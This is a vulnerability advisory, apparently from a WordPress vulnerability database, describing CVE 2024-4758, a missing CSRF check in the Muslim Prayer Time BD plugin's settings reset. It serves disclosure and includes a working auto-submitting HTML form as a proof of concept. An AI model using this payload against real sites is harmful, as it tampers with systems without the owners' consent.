Muslim Prayer Time BD <= 2.4 – Settings Reset via CSRF | CVE 2024-4758 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when reseting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=muslim-prayer-time-bd%2Fadmin-settings.php" method="post">
        <input type="hidden" name="option_page" value="mptb-settings-group" />
        <input type="hidden" name="clear_all" value="1" />
        <input type="submit" value="Submit" />
    </form>
</body>
```

Affects Plugins

muslim-prayer-time-bd

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

64ec57a5-35d8-4c69-bdba-096c2245a0db

Timeline

Publicly Published

2024-06-05 (about 25 days ago)

Added

2024-06-05 (about 24 days ago)

Last Updated

2024-06-05 (about 24 days ago)

Other

Published

Title

Published

2014-08-01

Title

Cardoza WordPress Poll <= 34.05 - Multiple External Function Remote Poll Manipulation

Published

2020-03-11

Title

Multiple WebToffee Plugins - Cross-Site Request Forgery (CSRF) Issue

Published

2024-06-12

Title

Himer - Social Questions and Answers < 2.1.1 - Multiple CSRF on the Group Section

Published

2024-04-05

Title

Ultimate Maps by Supsystic < 1.2.17 - Cross-Site Request Forgery

Published

2023-10-12

Title

Taggbox <= 3.3 - Cross-Site Request Forgery